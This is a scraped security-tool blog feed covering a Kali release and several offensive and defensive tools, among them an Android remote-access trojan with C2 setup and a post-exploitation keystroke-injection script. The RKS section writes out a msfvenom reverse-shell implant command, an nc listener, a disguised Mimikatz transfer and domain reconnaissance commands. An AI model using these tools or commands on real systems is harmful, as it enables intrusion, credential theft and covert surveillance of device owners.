Time for another Kali Linux release! – Kali Linux 2024.1. This release has various impressive updates.<span><a name='more'></a></span><div><p><br /></p><p>The summary of the <a href="https://bugs.kali.org/changelog_page.php">changelog</a> since the <a href="https://www.kali.org/blog/kali-linux-2023-4-release/">2023.4 release from December</a> is:</p><ul><li><strong><a href="https://www.kali.org/blog/kali-linux-2024-1-release/#introducing-the-micro-mirror-free-software-cdn">Micro Mirror Free Software CDN</a></strong> - FCIX Software Mirror reached out offering to host our images, and we said yes</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2024-1-release/#2024-theme-refresh">2024 Theme Refresh</a></strong> - Our yearly theme refresh with all new wallpapers and GRUB theme</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2024-1-release/#other-desktop-changes">Other Desktop Environment Changes</a></strong> - A few new tweaks to our default environments</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2024-1-release/#kali-nethunter-updates">NetHunter Updates</a></strong> - NetHunter Rootless for Android 14, Bad Bluetooth HID attacks, and other updates</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2024-1-release/#new-tools-in-kali">New Tools</a></strong> - As always, various new shiny tools!</li></ul></div><div><br />
<b>More info <a href="https://www.kali.org/blog/kali-linux-2024-1-release/">here</a>.</b><br /><br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://www.kali.org/get-kali/" rel="nofollow" target="_blank" title="Download Kali Linux">Download Kali Linux 2024.1</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-89733141207763984652024-03-02T08:30:00.005-03:002024-03-02T08:30:00.119-03:00Moukthar - Android Remote Administration Tool<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhcdWz2kKUnn43FCqdqvgv_4xjtcuRU8oGSxY0Qew4knORk5w6tvcMdX15ebD7q9AMAF70ETEo4UBp66fLCvYtWjU3iOW2G8NJ-PSfe6krUWQo_TyNJvGegdHxj7RmTXY5yWmfQziKWr5jDbVOf499u-OZzpr3VTWjUbtpqI3wMfZ7P0sIn4OhVvIjlplCp"><img alt="" border="0" height="308" id="BLOGGER_PHOTO_ID_7337936731549409714" src="https://blogger.googleusercontent.com/img/a/AVvXsEhcdWz2kKUnn43FCqdqvgv_4xjtcuRU8oGSxY0Qew4knORk5w6tvcMdX15ebD7q9AMAF70ETEo4UBp66fLCvYtWjU3iOW2G8NJ-PSfe6krUWQo_TyNJvGegdHxj7RmTXY5yWmfQziKWr5jDbVOf499u-OZzpr3VTWjUbtpqI3wMfZ7P0sIn4OhVvIjlplCp=w640-h308" width="640" /></a></p><div><br /></div> <p>Remote adminitration tool for android</p> <br /><span style="font-size: large;"><b>Features</b></span><br /> <ul> <li>Notifications listener</li> <li>SMS listener</li> <li>Phone call recording</li> <li>Image capturing and screenshots</li> <li>Persistence </li> <li>Read & write contacts</li> <li>List installed applications</li> <li>Download & upload files</li> <li>Get device location</li></ul><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Installation</b></span><br /> <ul> <li>Clone repository <code>console git clone https://github.com/Tomiwa-Ot/moukthar.git</code></li> <li>Move server files to <code>/var/www/html/</code> and install dependencies <code>console mv moukthar/Server/* /var/www/html/ cd /var/www/html/c2-server composer install cd /var/www/html/web\ socket/ composer install</code> The <a href="https://www.kitploit.com/search/label/Default%20Credentials" target="_blank" title="default credentials">default credentials</a> are username: <code>android</code> and password: <code>the rastafarian in you</code></li> <li>Set database <a href="https://www.kitploit.com/search/label/Credentials" target="_blank" title="credentials">credentials</a> in <code>c2-server/.env</code> and <code>web socket/.env</code></li> <li>Execute <code>database.sql</code></li> <li>Start web socket server or deploy as service in linux <code>console php Server/web\ socket/App.php # OR sudo mv Server/websocket.service /etc/systemd/system/ sudo systemctl daemon-reload sudo systemctl enable websocket.service sudo systemctl start websocket.service</code></li> <li>Modify <code>/etc/apache2/apache2.conf</code> <code>xml <Directory /var/www/html/c2-server> Options -Indexes DirectoryIndex app.php AllowOverride All Require all granted </Directory></code></li> <li>Set C2 server and web socket server address in client <code>functionality/Utils.java</code> ```java public static final String C2_SERVER = "http://localhost";</li> </ul> <p>public static final String WEB_SOCKET_SERVER = "ws://localhost:8080"; ``` - Compile APK using <a href="https://www.kitploit.com/search/label/Android%20Studio" target="_blank" title="Android Studio">Android Studio</a> and deploy to target</p> <div><br /></div><span style="font-size: large;"><b>TODO</b></span><br /> <ul> <li>Auto scroll logs on dashboard</li> </ul><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/Tomiwa-Ot/moukthar" rel="nofollow" target="_blank" title="Download Moukthar">Download Moukthar</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-71304122770715920032024-03-01T08:30:00.000-03:002024-03-01T08:30:00.125-03:00RKS - A Script To Automate Keystrokes Through A Graphical Desktop Program<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0XDiXypTK-P_SJe6-IPlWn0NhMiHd3yskhfaVmlqOdirJRN54QZsmCsTXhRFK586TVOBTldBPZXoAsN5JKsnzvWalJT8meCNIRa8IlwhYjMR9HbicCtfYthEcraze2KNpzgDZMcCPeBuKcx-3WSXTQK2VMxHQtOKSp4O8sndz8hsFKH5lyXku-C5YePKU/s1271/RKS.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="691" data-original-width="1271" height="348" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0XDiXypTK-P_SJe6-IPlWn0NhMiHd3yskhfaVmlqOdirJRN54QZsmCsTXhRFK586TVOBTldBPZXoAsN5JKsnzvWalJT8meCNIRa8IlwhYjMR9HbicCtfYthEcraze2KNpzgDZMcCPeBuKcx-3WSXTQK2VMxHQtOKSp4O8sndz8hsFKH5lyXku-C5YePKU/w640-h348/RKS.png" width="640" /></a></div><p><br /></p> <p>A script to automate keystrokes through an active <a href="https://www.kitploit.com/search/label/Remote%20Desktop" target="_blank" title="remote desktop">remote desktop</a> session that assists offensive operators in combination with <a href="https://www.kitploit.com/search/label/Living%20Off%20The%20Land" target="_blank" title="living off the land">living off the land</a> techniques.</p> <br /><span style="font-size: large;"><b>About RKS (RemoteKeyStrokes)</b></span><br /> <p>All credits goes to <a href="https://github.com/nopernik" rel="nofollow" target="_blank" title="nopernik">nopernik</a> for making it possible so I took it upon myself to improve it. I wanted something that helps during the <a href="https://www.kitploit.com/search/label/Post%20Exploitation" target="_blank" title="post exploitation">post exploitation</a> phase when executing commands through a remote desktop.</p> <span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Help Menu</b></span><br /> <pre><code>$ ./rks.sh -h<br />Usage: ./rks.sh (RemoteKeyStrokes)<br />Options:<br /> -c, --command <command | cmdfile> Specify a command or a file containing to execute<br /> -i, --input <input_file> Specify the local input file to transfer<br /> -o, --output <output_file> Specify the remote output file to transfer<br /> -m, --method <method> Specify the file transfer or execution method<br /> (For file transfer "base64" is set by default if<br /> not specified. For execution method "none" is set<br /> by default if not specified)<br /><br /> -p, --platform <operating_system> Specify the operating system (windows is set by<br /> default if not specified)<br /><br /> -w, --windowname <name> Specify t he window name for graphical remote<br /> program (freerdp is set by default if not<br /> specified)<br /><br /> -h, --help Display this help message<br /></code></pre> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <br /><b>Internal Reconnaissance</b><br /> <ul> <li>When running in command prompt</li> </ul> <pre><code>$ cat recon_cmds.txt<br />whoami /all<br />net user<br />net localgroup Administrators<br />net user /domain<br />net group "Domain Admins" /domain<br />net group "Enterprise Admins" /domain<br />net group "Domain Computers" /domain<br /><br />$ ./rks.h -c recon_cmds.txt<br /></code></pre> <br /><b>Execute Implant</b><br /> <ul> <li>Execute an implant while reading the contents of the payload in powershell.</li> </ul> <pre><code>$ msfvenom -p windowx/x64/shell_reverse_tcp lhost=<IP> lport=4444 -f psh -o implant.ps1<br /><br />$ ./rks.sh -c implant.ps1<br /><br />$ nc -lvnp 4444<br /></code></pre> <br /><b>File Transfer</b><br /> <ul> <li>Transfer a file remotely when pivoting in a isolated network. If you want to specify the remote path on windows be sure to include quotes.</li> </ul> <pre><code>$ ./rks.sh -i /usr/share/powersploit/Privesc/PowerUp.ps1 -o script.ps1<br /><br />$ ./rks.sh -i /usr/share/powersploit/Exfiltration/Invoke-Mimikatz.ps1 -o "C:\Windows\Temp\update.ps1" -m base64<br /></code></pre> <br /><b>Specify Grapical Remote Software</b><br /> <ul> <li>If you're targeting VNC network protocols you can specify the window name with <code>tightvnc</code>.</li> </ul> <p><code>$ ./rks.sh -i implant.ps1 -w tightvnc</code></p> <ul> <li>If you're targeting legacy operating systems with older RDP <a href="https://www.kitploit.com/search/label/Authentication" target="_blank" title="authentication">authentication</a> specify the window name with <code>rdesktop</code>.</li> </ul> <p><code>$ ./rks.sh -i implant.bat -w rdesktop</code></p> <br /><span style="font-size: large;"><b>TODO and Help Wanted</b></span><br /> <ul> <li> <p>Add text colors for better user experience</p> </li> <li> <p>Implement Base64 file transfer</p> </li> <li> <p>Implement Bin2Hex file transfer</p> </li> <li> <p>Implement a persistence function for both windows and linux.</p> </li> <li> <p>Implement <a href="https://www.kitploit.com/search/label/Antiforensics" target="_blank" title="antiforensics">antiforensics</a> function for both windows and linux.</p> </li> <li> <p>Implement to read shellcode input and run C# implant and powershell runspace</p> </li> <li> <p>Implement privesc function for both windows and linux</p> </li> </ul> <br /><span style="font-size: large;"><b>References</b></span><br /> <ul> <li> <p><a href="https://www.youtube.com/watch?v=8YFEujJUxws" rel="nofollow" target="_blank" title="Video: sethc.exe Backdoor CMD Payload delivery (USB Rubber Ducky style)">Video: sethc.exe Backdoor CMD Payload delivery (USB Rubber Ducky style)</a></p> </li> <li> <p><a href="https://github.com/nopernik/mytools/blob/master/rdp-cmd-delivery.sh" rel="nofollow" target="_blank" title="Original Script">Original Script</a></p> </li> <li> <p><a href="https://github.com/ztgrace/sticky_keys_hunter" rel="nofollow" target="_blank" title="sticky_keys_hunter">sticky_keys_hunter</a></p> </li> </ul> <br /><span style="font-size: large;"><b>Credits</b></span><br /> <ul> <li><a href="https://github.com/nopernik" rel="nofollow" target="_blank" title="nopernik">nopernik</a></li> </ul><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/U53RW4R3/RKS" rel="nofollow" target="_blank" title="Download RKS">Download RKS</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-57521009068010929142024-02-29T20:30:00.003-03:002024-02-29T20:30:00.125-03:00LeakSearch - Search & Parse Password Leaks<p align="center"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgalFuqSTMVub-Sx0tu5NnujnSSIjVp_zOdv97hjJdympwu7RU0SdvZAKWOtUfhEGyN-PixHDck0O78q2udqUlqYIr5Vbo6vadwj0JG5GFRaxy9a4HltYVFKjXqrpWZwerTC7vKCkST6q_j1ag7BQOwyykSTvswSIVnKN0wG7j6mwhGhE6xK2z6FDijFZMP"><img alt="" border="0" height="404" id="BLOGGER_PHOTO_ID_7337931135416379826" src="https://blogger.googleusercontent.com/img/a/AVvXsEgalFuqSTMVub-Sx0tu5NnujnSSIjVp_zOdv97hjJdympwu7RU0SdvZAKWOtUfhEGyN-PixHDck0O78q2udqUlqYIr5Vbo6vadwj0JG5GFRaxy9a4HltYVFKjXqrpWZwerTC7vKCkST6q_j1ag7BQOwyykSTvswSIVnKN0wG7j6mwhGhE6xK2z6FDijFZMP=w640-h404" width="640" /></a></p> <br /> <p><strong>LeakSearch</strong> is a simple tool to search and parse plain text <a href="https://www.kitploit.com/search/label/Passwords" target="_blank" title="passwords">passwords</a> using ProxyNova COMB (Combination Of Many Breaches) over the Internet. You can define a custom proxy and you can also use your own password file, to search using different keywords: such as user, domain or password. </p> <p>In addition, you can define how many results you want to display on the terminal and export them as <a href="https://www.kitploit.com/search/label/JSON" target="_blank" title="JSON">JSON</a> or TXT files. Due to the simplicity of the code, it is very easy to add new sources, so more providers will be added in the future.</p> <span><a name='more'></a></span><div><br /></div><span style="font-size: x-large;"><b>Requirements</b></span><br /> <ul> <li>Python 3 </li> <li>Install requirements</li> </ul> <br /><span style="font-size: x-large;"><b>Download</b></span><br /> <p>It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:</p> <pre><code>git clone https://github.com/JoelGMSec/LeakSearch<br /></code></pre> <br /><span style="font-size: x-large;"><b>Usage</b></span><br /> <pre><code> _ _ ____ _ <br /> | | ___ __ _| | __/ ___| ___ __ _ _ __ ___| |__ <br /> | | / _ \/ _` | |/ /\___ \ / _ \/ _` | '__/ __| '_ \ <br /> | |__| __/ (_| | < ___) | __/ (_| | | | (__| | | |<br /> |_____\___|\__,_|_|\_\|____/ \___|\__,_|_| \___|_| |_|<br /><br /> ------------------- by @JoelGMSec -------------------<br /><br />usage: LeakSearch.py [-h] [-d DATABASE] [-k KEYWORD] [-n NUMBER] [-o OUTPUT] [-p PROXY]<br /><br />options:<br /> -h, --help show this help message and exit<br /> -d DATABASE, --database DATABASE<br /> Database used for the search (ProxyNova or LocalDataBase)<br /> -k KEYWORD, --keyword KEYWORD<br /> Keyword (user/domain/pass) to search for <a href="https://www.kitploit.com/search/label/Leaks" target="_blank" title="leaks">leaks</a> in the DB<br /> -n NUMBER, --number NUMBER<br /> Number of results to show (default is 20)<br /> -o OUTPUT, --output OUTPUT<br /> Save the results as json or txt into a file<br /> -p PROXY, --proxy PROXY<br /> Set HTTP/S proxy (like http://localhost:8080)<br /><br /></code></pre> <br /><span style="font-size: large;"><b>The detailed guide of use can be found at the following link:</b></span><br /> <p>https://darkbyte.net/buscando-y-filtrando-contrasenas-con-leaksearch</p> <br /><span style="font-size: x-large;"><b>License</b></span><br /> <p>This project is licensed under the <a href="https://www.kitploit.com/search/label/GNU" target="_blank" title="GNU">GNU</a> 3.0 license - see the LICENSE file for more details.</p> <br /><span style="font-size: x-large;"><b>Credits and Acknowledgments</b></span><br /> <p>This tool has been created and designed from scratch by Joel Gámez Molina (@JoelGMSec).</p> <br /><span style="font-size: x-large;"><b>Contact</b></span><br /> <p>This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.</p> <p>For more information, you can find me on <a href="https://www.kitploit.com/search/label/Twitter" target="_blank" title="Twitter">Twitter</a> as <a href="https://twitter.com/JoelGMSec" rel="nofollow" target="_blank" title="@JoelGMSec">@JoelGMSec</a> and on my blog <a href="https://darkbyte.net" rel="nofollow" target="_blank" title="darkbyte.net">darkbyte.net</a>.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/JoelGMSec/LeakSearch" rel="nofollow" target="_blank" title="Download LeakSearch">Download LeakSearch</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-11649254077707006222024-02-28T08:30:00.008-03:002024-02-28T08:30:00.130-03:00CanaryTokenScanner - Script Designed To Proactively Identify Canary Tokens Within Microsoft Office Documents And Acrobat Reader PDF (docx, xlsx, pptx, pdf)<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgwVXueB5F2b67Yyrfb_cROA2YmSiABp_GfA29nu62xPpn6hQz3DKfCKTb_GDjKZ6RNmBQF1Bv2hRbCODlOxt6r48okD8RUYr2XgFFS3a3bckQVfOjCQpX5Mqr52N3Cofk-ViPoqgf1SZ5PI6aUM-fFVvaHnWf5q9rXcTwmbmhVFNRGyFfinbcUC_gs4_AG"><img alt="" border="0" height="122" id="BLOGGER_PHOTO_ID_7337930840565836562" src="https://blogger.googleusercontent.com/img/a/AVvXsEgwVXueB5F2b67Yyrfb_cROA2YmSiABp_GfA29nu62xPpn6hQz3DKfCKTb_GDjKZ6RNmBQF1Bv2hRbCODlOxt6r48okD8RUYr2XgFFS3a3bckQVfOjCQpX5Mqr52N3Cofk-ViPoqgf1SZ5PI6aUM-fFVvaHnWf5q9rXcTwmbmhVFNRGyFfinbcUC_gs4_AG=w640-h122" width="640" /></a></p><div><br /></div><span style="font-size: large;"><b>Detecting Canary Tokens and Suspicious URLs in <a href="https://www.kitploit.com/search/label/Microsoft" target="_blank" title="Microsoft">Microsoft</a> Office, Acrobat Reader PDF and Zip Files</b></span><br /> <br /><b>Introduction</b><br /> <p>In the dynamic realm of cybersecurity, vigilance and proactive <a href="https://www.kitploit.com/search/label/Defense" target="_blank" title="defense">defense</a> are key. Malicious actors often leverage Microsoft Office files and Zip archives, embedding covert URLs or macros to initiate harmful actions. This Python script is crafted to detect potential threats by scrutinizing the contents of Microsoft Office documents, Acrobat Reader PDF documents and Zip files, reducing the risk of inadvertently triggering malicious code.</p><span><a name='more'></a></span><p><br /></p><b>Understanding the Script</b><br /> <br /><b>Identification</b><br /> <p>The script smartly identifies Microsoft Office documents (.docx, .xlsx, .pptx), Acrobat Reader PDF documents (.pdf) and Zip files. These file types, including Office documents, are zip archives that can be examined programmatically.</p> <br /><b>Decompression and Scanning</b><br /> <p>For both Office and Zip files, the script decompresses the contents into a temporary directory. It then scans these contents for URLs using regular expressions, searching for potential signs of compromise.</p> <br /><b>Ignoring Certain URLs</b><br /> <p>To minimize false positives, the script includes a list of domains to ignore, filtering out common URLs typically found in Office documents. This ensures focused <a href="https://www.kitploit.com/search/label/Analysis" target="_blank" title="analysis">analysis</a> on unusual or potentially harmful URLs.</p> <br /><b>Flagging Suspicious Files</b><br /> <p>Files with URLs not on the ignored list are marked as suspicious. This heuristic method allows for adaptability based on your specific security context and threat landscape.</p> <br /><b>Cleanup and Restoration</b><br /> <p>Post-scanning, the script cleans up by erasing temporary decompressed files, leaving no traces.</p> <br /><b>Usage</b><br /> <p>To effectively utilize the script:</p> <ol> <li><strong>Setup</strong></li> <li>Ensure Python is installed on your system.</li> <li>Position the script in an accessible location.</li> <li> <p>Execute the script with the command: <code>python CanaryTokenScanner.py FILE_OR_DIRECTORY_PATH</code> (Replace <code>FILE_OR_DIRECTORY_PATH</code> with the actual file or <a href="https://www.kitploit.com/search/label/Directory" target="_blank" title="directory">directory</a> path.)</p> </li> <li> <p><strong>Interpretation</strong></p> </li> <li>Examine the output. Remember, this script is a starting point; flagged documents might not be harmful, and not all malicious documents will be flagged. Manual examination and additional security measures are advisable.</li> </ol> <br /><b>Script Showcase</b><br /> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgwVXueB5F2b67Yyrfb_cROA2YmSiABp_GfA29nu62xPpn6hQz3DKfCKTb_GDjKZ6RNmBQF1Bv2hRbCODlOxt6r48okD8RUYr2XgFFS3a3bckQVfOjCQpX5Mqr52N3Cofk-ViPoqgf1SZ5PI6aUM-fFVvaHnWf5q9rXcTwmbmhVFNRGyFfinbcUC_gs4_AG"><img alt="" border="0" height="122" id="BLOGGER_PHOTO_ID_7337930840565836562" src="https://blogger.googleusercontent.com/img/a/AVvXsEgwVXueB5F2b67Yyrfb_cROA2YmSiABp_GfA29nu62xPpn6hQz3DKfCKTb_GDjKZ6RNmBQF1Bv2hRbCODlOxt6r48okD8RUYr2XgFFS3a3bckQVfOjCQpX5Mqr52N3Cofk-ViPoqgf1SZ5PI6aUM-fFVvaHnWf5q9rXcTwmbmhVFNRGyFfinbcUC_gs4_AG=w640-h122" width="640" /></a> </p><p style="text-align: center;"><em>An example of the Canary Token Scanner script in action, demonstrating its capability to detect suspicious URLs.</em></p> <br /><b>Disclaimer</b><br /> <p>This script is intended for educational and security testing purposes only. Utilize it responsibly and in <a href="https://www.kitploit.com/search/label/Compliance" target="_blank" title="compliance">compliance</a> with applicable laws and regulations.</p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/0xNslabs/CanaryTokenScanner" rel="nofollow" target="_blank" title="Download CanaryTokenScanner">Download CanaryTokenScanner</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-12609197685656093042024-02-27T08:30:00.011-03:002024-02-27T08:30:00.137-03:00Huntr-Com-Bug-Bounties-Collector - Keep Watching New Bug Bounty (Vulnerability) Postings<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEipHwXsYxZpBE2qFj_ZQIUc2Xu3-T2hYWe_nlpzMKHtzR3Ay7gVZ6mrF0tQr6kMul_NKwtdyQRGou0DxlLIIFU0UfkfQHDphNH-Q52m5f7j2lh62ijvN6UEYxOZAoM_Y50TfqYPmCkmy-hSf-9D6jpWGuEX_TaUaBmlTaBOWA9gdBBvno5vBUA_RlcBDHde"><img alt="" border="0" height="458" id="BLOGGER_PHOTO_ID_7337938156415012754" src="https://blogger.googleusercontent.com/img/a/AVvXsEipHwXsYxZpBE2qFj_ZQIUc2Xu3-T2hYWe_nlpzMKHtzR3Ay7gVZ6mrF0tQr6kMul_NKwtdyQRGou0DxlLIIFU0UfkfQHDphNH-Q52m5f7j2lh62ijvN6UEYxOZAoM_Y50TfqYPmCkmy-hSf-9D6jpWGuEX_TaUaBmlTaBOWA9gdBBvno5vBUA_RlcBDHde=w640-h458" width="640" /></a></p><br /> <p>New bug bounty(vulnerabilities) collector</p> <span><a name='more'></a></span><p><br /></p><span style="font-size: x-large;"><b>Requirements</b></span><br /> <ul> <li>Chrome with GUI (If you encounter trouble with script execution, check the status of VMs GPU features, if available.)</li> <li>Chrome WebDriver</li></ul> <br /><span style="font-size: x-large;"><b>Preview</b></span><br /> <pre><code># python3 main.py<br /><br />*2024-02-20 16:14:47.836189*<br /><br />1. Arbitrary File Reading due to Lack of Input Filepath Validation<br />- Feb 6th 2024 / High (CVE-2024-0964)<br />- gradio-app/gradio<br />- https://huntr.com/bounties/25e25501-5918-429c-8541-88832dfd3741/<br /><br />2. View Barcode Image leads to <a href="https://www.kitploit.com/search/label/Remote" target="_blank" title="Remote">Remote</a> Code Execution<br />- Jan 31st 2024 / Critical (CVE: Not yet)<br />- dolibarr/dolibarr<br />- https://huntr.com/bounties/f0ffd01e-8054-4e43-96f7-a0d2e652ac7e/<br /><br /></code></pre> <p>(delimiter-based file database)</p> <pre><code># <a href="https://www.kitploit.com/search/label/Vim" target="_blank" title="vim">vim</a> feeds.db<br /><br />1|2024-02-20 16:17:40.393240|7fe14fd58ca2582d66539b2fe178eeaed3524342|CVE-2024-0964|https://huntr.com/bounties/25e25501-5918-429c-8541-88832dfd3741/<br />2|2024-02-20 16:17:40.393987|c6b84ac808e7f229a4c8f9fbd073b4c0727e07e1|CVE: Not yet|https://huntr.com/bounties/f0ffd01e-8054-4e43-96f7-a0d2e652ac7e/<br />3|2024-02-20 16:17:40.394582|7fead9658843919219a3b30b8249700d968d0cc9|CVE: Not yet|https://huntr.com/bounties/d6cb06dc-5d10-4197-8f89-847c3203d953/<br />4|2024-02-20 16:17:40.395094|81fecdd74318ce7da9bc29e81198e62f3225bd44|CVE: Not yet|https://huntr.com/bounties/d875d1a2-7205-4b2b-93cf-439fa4c4f961/<br />5|2024-02-20 16:17:40.395613|111045c8f1a7926174243db403614d4a58dc72ed|CVE: Not yet|https://huntr.com/bounties/10e423cd-7051-43fd-b736-4e18650d0172/<br /></code></pre> <br /><span style="font-size: large;"><b>Notes</b></span><br /> <ul> <li>This code is designed to parse HTML elements from huntr.com, so it may not function correctly if the HTML page structure changes. </li> <li>In case of errors during parsing, exception handling has been included, so if it doesn't work as expected, please inspect the HTML source for any changes.</li> <li>If get in trouble In a typical <a href="https://www.kitploit.com/search/label/Cloud" target="_blank" title="cloud">cloud</a> environment, <a href="https://www.kitploit.com/search/label/Scripts" target="_blank" title="scripts">scripts</a> may not function properly within virtual machines (VMs).</li> </ul><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/password123456/huntr-com-bug-bounties-collector" rel="nofollow" target="_blank" title="Download Huntr-Com-Bug-Bounties-Collector">Download Huntr-Com-Bug-Bounties-Collector</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-71268029381772075822024-02-26T08:30:00.006-03:002024-02-26T08:30:00.141-03:00BackDoorSim - An Educational Into Remote Administration Tools<p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCDyueyU26LM9aLQPbpoMyxMgwxtXzCl6HK6JmoKVrU27Y61F10oDEPbDOr4p5TW16bQZhXaZrEuXdUpLNkkCl1WceelIRXKLMOdmirxENlD_Z-P6zTwjZjBaex9O1A073GF3XNRajsht4LRva1xUw1NTphQ3xXDmkdKWEPVs-AozdAIjFUWKKtMApoAL4/s1905/BackDoorSim.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="955" data-original-width="1905" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCDyueyU26LM9aLQPbpoMyxMgwxtXzCl6HK6JmoKVrU27Y61F10oDEPbDOr4p5TW16bQZhXaZrEuXdUpLNkkCl1WceelIRXKLMOdmirxENlD_Z-P6zTwjZjBaex9O1A073GF3XNRajsht4LRva1xUw1NTphQ3xXDmkdKWEPVs-AozdAIjFUWKKtMApoAL4/w640-h320/BackDoorSim.png" width="640" /></a></div><br /><p></p><p><code>BackdoorSim</code> is a remote administration and monitoring tool designed for educational and testing purposes. It consists of two main components: <code>ControlServer</code> and <code>BackdoorClient</code>. The server controls the client, allowing for various <a href="https://www.kitploit.com/search/label/Operations" target="_blank" title="operations">operations</a> like file transfer, system monitoring, and more.</p> <span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b><strong>Disclaimer</strong></b></span><br /> <p>This tool is intended for educational purposes only. Misuse of this software can violate <a href="https://www.kitploit.com/search/label/Privacy" target="_blank" title="privacy">privacy</a> and security policies. The developers are not responsible for any misuse or damage caused by this software. Always ensure you have permission to use this tool in your intended environment.</p> <br /><span style="font-size: large;"><b><strong>Features</strong></b></span><br /> <ul> <li><strong>File Transfer</strong>: Upload and download files between server and client.</li> <li><strong>Screenshot Capture</strong>: Take screenshots from the client's system.</li> <li><strong>System Information Gathering</strong>: Retrieve detailed system and security software information.</li> <li><strong>Camera Access</strong>: <a href="https://www.kitploit.com/search/label/Capture" target="_blank" title="Capture">Capture</a> images from the client's webcam.</li> <li><strong>Notifications</strong>: Send and display notifications on the client system.</li> <li><strong>Help Menu</strong>: Easy access to command information and usage.</li> </ul> <br /><span style="font-size: large;"><b><strong>Installation</strong></b></span><br /> <p>To set up <code>BackdoorSim</code>, you will need to install it on both the server and client machines.</p> <ol> <li>Clone the repository:</li> </ol> <p><code>shell $ git clone https://github.com/HalilDeniz/BackDoorSim.git</code></p> <ol> <li>Navigate to the project directory:</li> </ol> <p><code>shell $ cd BackDoorSim</code></p> <ol> <li>Install the required dependencies:</li> </ol> <p><code>shell $ pip install -r requirements.txt</code></p> <br /><span style="font-size: large;"><b><strong>Usage</strong></b></span><br /> <p>After starting both the server and client, you can use the following commands in the server's command prompt:</p> <ul> <li><code>upload [file_path]</code>: Upload a file to the client.</li> <li><code>download [file_path]</code>: Download a file from the client.</li> <li><code>screenshot</code>: Capture a <a href="https://www.kitploit.com/search/label/Screenshot" target="_blank" title="screenshot">screenshot</a> from the client.</li> <li><code>sysinfo</code>: Get system information from the client.</li> <li><code>securityinfo</code>: Get security software status from the client.</li> <li><code>camshot</code>: Capture an image from the client's webcam.</li> <li><code>notify [title] [message]</code>: Send a notification to the client.</li> <li><code>help</code>: Display the help menu.</li> </ul> <br /><span style="font-size: large;"><b><strong>Disclaimer</strong></b></span><br /> <p>BackDoorSim is developed for educational purposes only. The creators of BackDoorSim are not responsible for any misuse of this tool. This tool should not be used in any unauthorized or illegal manner. Always ensure ethical and legal use of this tool.</p> <br /><span style="font-size: large;"><b><strong>DepNot: RansomwareSim</strong></b></span><br /> <p>If you are interested in tools like BackdoorSim, be sure to check out my recently released <strong><a href="https://denizhalil.com/2023/12/30/ransomware-prevention-education/" rel="nofollow" target="_blank" title="RansomwareSim">RansomwareSim</a></strong> tool</p> <br /><span style="font-size: large;"><b><strong>BackdoorSim: An Educational into <a href="https://www.kitploit.com/search/label/Remote%20Administration" target="_blank" title="Remote Administration">Remote Administration</a> Tools</strong></b></span><br /> <p>If you want to read our article about <a href="https://denizhalil.com/2024/01/29/educational-remote-administration-tool-backdoorsim/" rel="nofollow" target="_blank" title="Backdoor">Backdoor</a></p> <br /><span style="font-size: large;"><b><strong>Contributing</strong></b></span><br /> <p>Contributions, suggestions, and feedback are welcome. Please create an issue or pull request for any contributions. 1. Fork the repository. 2. Create a new branch for your feature or bug fix. 3. Make your changes and commit them. 4. Push your changes to your forked repository. 5. Open a pull request in the main repository.</p> <br /><span style="font-size: large;"><b><strong>Contact</strong></b></span><br /> <p>For any inquiries or further information, you can reach me through the following channels:</p> <ul> <li>LinkedIn : <a href="https://www.linkedin.com/in/halil-ibrahim-deniz/" rel="nofollow" target="_blank" title="Halil Ibrahim Deniz">Halil Ibrahim Deniz</a></li> <li>TryHackMe: <a href="https://tryhackme.com/p/halilovic" rel="nofollow" target="_blank" title="Halilovic">Halilovic</a></li> <li>Instagram: <a href="https://www.instagram.com/deniz.halil333/" rel="nofollow" target="_blank" title="deniz.halil333">deniz.halil333</a></li> <li>YouTube : <a href="https://www.youtube.com/c/HalilDeniz" rel="nofollow" target="_blank" title="Halil Deniz">Halil Deniz</a></li> <li>Email : halildeniz313@gmail.com</li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/HalilDeniz/BackDoorSim" rel="nofollow" target="_blank" title="Download 